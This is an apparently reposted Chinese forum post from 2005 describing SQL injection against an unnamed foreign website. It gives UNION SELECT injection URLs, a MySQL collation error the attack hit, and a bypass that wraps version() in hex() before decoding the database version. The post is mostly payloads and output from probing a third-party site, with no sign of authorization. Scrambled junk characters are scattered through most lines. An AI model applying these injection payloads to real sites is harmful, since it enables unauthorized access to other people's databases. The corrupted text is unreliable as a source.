本文作者:SuperHei
$ b/ u; {: s# M4 e" w文章性质:原创
, B8 n9 l( t: ^- O4 E发布日期:2005-10-18& j/ c+ ~- v* \; e/ E7 J- x6 _* S
测试个国外的站时:
% F! }. H( {0 ^8 ^- V9 {url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
4 `) |2 t: c S1 B' w返回错误:/ S; a- P: h8 W& [0 m
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
( z$ P/ q8 m- _, @9 }! E3 a- [( ?MySQL Error No. 126+ S" o p3 w: K, w3 P' @' Y0 f
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
9 r( |( @5 ~: l3 t, s0 u解决办法:转为其他编码如hex。 d% l j" v( l, u2 V3 z/ B
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
2 g7 a5 o! y# j- i$ h& x成功得到hex(version())的值为:6 P; w3 i y+ z9 j3 e2 W
342E312E332D62657461
9 |8 S' B9 R: x$ {+ ~9 V4 t- G- V; P% G回Mysql查询下得到:
, b. j [, U* Rmysql> select 0x342E312E332D62657461;. z- `5 \. v6 ?1 T& ?& b8 R0 s
+------------------------+
* h3 H! B' `3 @) v/ z3 D0 v| 0x342E312E332D62657461 |
- K- f+ Z" A5 ^9 H; M8 _0 V+------------------------+
, `- \. j+ B0 L3 d/ p! G| 4.1.3-beta |
+ P# h$ q. }0 P& e+------------------------+6 A9 |5 d+ G, `
1 row in set (0.00 sec)2 l9 Q: ?: ]9 y' C2 Y5 p
4 P3 H: E% J4 [7 k& B0 ^7 I$ Z |
发表于 2012-9-15 14:04:54
收藏
支持
反对